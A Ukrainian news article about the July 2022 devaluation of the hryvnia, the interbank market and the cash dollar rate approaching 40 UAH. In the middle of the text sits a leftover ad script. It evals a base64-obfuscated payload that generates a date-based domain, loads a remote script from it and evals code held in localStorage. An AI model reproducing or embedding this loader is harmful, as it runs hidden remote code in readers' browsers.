Долар на «чорному ринку» по 40 грн/$: що з курсом

Після девальвації офіційного фіксованого курсу, експортери понесли валюту на продаж. Попит на кілька днів впав і Нацбанк почав скуповувати долар в резерви. Водночас на готівковому ринку курс долара наблизився до 40 грн$.

Долар на чорному ринку по 40 грн/$. Що з курсом? 01

Міжбанківський ринок, на якому банки купують і продають валюту за заявками клієнтів, та готівковий живуть в паралельних реальностях.

Після зниження офіційного курсу гривні до 36,56 грн/$, на міжбанку (де курс не може відхилятися на 1% від офіційного) кілька днів поспіль пропозиція перевищувала попит і НБУ почав скуповувати валюту в резерви. Однак уже з вівторка попит на валюту повернувся на ринок, повідомляє Бізнес Цензор.

Тим часом готівковий курс долара активно зростає — з 21 липня і на 27 липня котирування впритул наблизилися до 40 грн/$.

БізнесЦензор розбирався, що відбувається на міжбанку та на готіковому ринку.

Міжбанк. Експортери частково понесли валюту на продаж

Національний банк 21 липня девальвував офіційний курс гривні до долара США на 20% — з 29,25 грн/$ до 36,56 грн/$.

Це перша корекція офіційного курсу з 24 лютого. В день повномасштабного вторгнення НБУ зафіксував курс на довоєнному рівні. Це на якийсь час допомогло стримати паніку серед населення, та зафіксувати вартість критичного імпорту.

Одак, після зростання курсу долара на чорному ринку, а також після того як НБУ відпустив готівковий курс, це породило різницю в 7-8 грн на доларів між офіційним курсом, по якому бізнес має продавати та купувати валюту, та готівковим.

В результаті експортери почали притримувати валютну виручку на закордонних рахунках в очікуванні корекції курсу Нацбанком, яку він провів лише 21 липня, знизивши курс гривні до 36,6 грн/$.

На наступний день після підняття фіксованого курсу долара, пропозиція валюти на міжбанку перевищила попит і НБУ викупив в резерви понад $223,2 млн, що перевищує весь обсяг купленої ним валюти на міжбанку за попередні 18 тижнів.

Експортери, в тому числі і ІТ-компанії та ІТ-ФОП, після підняття курсу, почали продавати валютну виручку, яку вони притримували в очікуванні кращого курсу.

Водночас попит на валюта також впав — НБУ минулого тижня продав на міжбанку $309,2 млн, це найменший обсяг проданою валюти з початку березня. Раніше, для підтримки курсу гривні на рівні 29,25 грн/$, НБУ щотижня продавав з резервів $500 млн-$1 млрд.

Долар на чорному ринку по 40 грн/$. Що з курсом? 02

Учасники ринку розповідають, що після підняття фіксованого курсу долара до 36,6 грн/$, пропозиція валюти від експортерів зросла, натомість імпортери зменшили попит. В результаті перевищення пропозиції валюти над попитом, НБУ почав скуповувати її в резерви.

В понеділок ця тенденція продовжилась. Нацбанк за день викупив в резерви більше $600 млн.

За словами учасників ринку, ця сума більш як в два рази перевищує середньоденні обсяги торгів на міжбанку, що пояснюватися не тільки бажанням експоретрів продати валютну виручки, але і поведінкою Мінфіну, який продавав валюту, отриману від міжнародних партнерів у вигляді грантів та кредитів.

Мінфін може продавати напряму НБУ, а також на ринку через один з держанків.

Однак у вівторок та середу попит на валюту знову почав домінувати на ринку, а експортери скоротили пропозицію валюти.

Подальшу позитивну динаміку з надходженням валютної виручки фінансисти пов’язують з розблокуванням українських портів та відновленням експорту агропродукції. А також з надходженням за графіком запланованої фінансової допомоги від західних партнерів України. До кінця року Україна планує отримати близько $20 млрд допомоги та підтримки від міжнародних партнерів. В тому числі пакет макрофінансової допомоги від ЄС на 9 млрд євро.

Готівковий курс. Долар на чорному ринку пробив позначку 40 грн/$

Якщо на міжбанку, після корекції фіксованого курсу, пропозиція валюти зросла хоча б на кілька днів і НБУ почав скуповувати її в резерви, то на готівковому ринку ситуація інша. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

З 21 липня по 26 липня середній курс продажу долара в банківським обмінниках зріс на 2,55 грн до 39,95 грн/$, а покупки — на 2,45 грн до 39 грн/$.

Водночас, з моменту корекції офіційного курсу, на чорному ринку курс продажу долара 27 липня виріс на 3,4 грн до 40,4 грн/$. Аналогічно дорожчає і євро — з 21 липня європейська валюта подорожчала на чорному ринку на 3,3 гривні до 40,8.

Водночас, після перетину рубежу в 40 грн/$, кількість заявок на продаж почала перевищувати кількість заявок на покупку.

Долар на чорному ринку по 40 грн/$. Що з курсом? 03

Котирування долара США на «чорному ринку»

Окрім девальваційних очікувань населення (очікування «долара по 40 грн»), дефіцит готівкової валюти — ще одна причина зростання готівкового курсу долара.

До повномасштабної війни готівкова валюта завозилася в Україну літаками. З 24 лютого небо для цивільної авіації закрито і, на тлі вивозу валюти вимушеними переселенцями, виник дефіцит готівки.

Чи не єдиним каналом притоку готівковки долара та євро залишаються українські заробітчани, а також «карткові туристи», які намагаються заробляти на різниці між картковими валютними курсами та готівковими на сірому ринку (знімають в банкоматах країн ЄС з гривневих карток з конвертацією 37,6 грн/євро, доставляють в Україну в продають через обмінники по 40,8 грн/євро).

При цьому на готівковий курс валют, який за обсягами в рази менший ніж міжбанк, після фіксації офіційного курсу, почали орієнтуватися бізнес та населення. Однак його обсяг в рази менший, ніж міжбанку, який останні два місяці коливається в межах $150-280 млн на день.

В Нацбанку відзначають, що переважну частку пропозиції та попиту на валютному ринку України формують експортери та імпортери, які через фіксацію, не впливають на формування курсу.

«Змінюється курс лише на готівковому ринку, участь у якому бере населення. Ці коливання не відображають загальної ситуації в економіці, а свідчить про баланс попиту та пропозиції на готівкову валюту серед громадян», — пояснювали раніше в НБУ.

Попри це, через фіксацію офіційного курсу та привязу до нього міжбанку, де курс не може відхилятися від офіційного на 1%, готівковий курс перебрав на себе функцію орієнтиру.

«Саме тому я побоююсь коливань на готівковому ринку, оскільки вони матимуть негативний вплив на очікування людей, які орієнтуються не на офіційний (фіксований) курс, а на курс в обміннику біля базару», — коментує ситуацію фінансовий аналітик ICU Михайло Демків.

Щоб збільшити пропозицію валюти на готівковому ринку, з 27 липня Нацбанк дозволив банкам продавати в готівковому сегменті половину від купленої в громадян з 13 квітня безготівкової валюти додатково до продажу придбаної з цієї ж дати готівкової валюти.

Альтернатива долару з обмінників

Щоб зменшити попит на готівкову валюту, 21 липня НБУ дозволив банкам продавати населенню безготівкову валюту але з подальшим розміщенням на депозит від трьох місяців.

Продавати безготівкову валюту під депозити банкам було дозволено в обсязі не більше 50 тис грн на місяць.

Це може бути альтернативою інвестиціям у готівкову валюту, адже безготівковий курс продажу долара у банках більш як на дві гривні нижчий, ніж готівковий: 36,9 грн проти 39,9 грн/$.

Цього тижня деякі банки уже запустили такий продукт.

Однак доведеться сплатити додаткові комісії. Один з банків, який запустив такі валютні депозити, стягує 0,3% за купівлю валюти при відкритті депозити, та 1% за зняття валюти після його закінчення.

Натомість номінальна ставка за короткими валютними депозитами у банках коливається від 1,4%-3% річних в залежності від банку та строку вкладу.  (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/dolar-na-chornomu-rinku-po-40-grn-shho-z-kursom/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top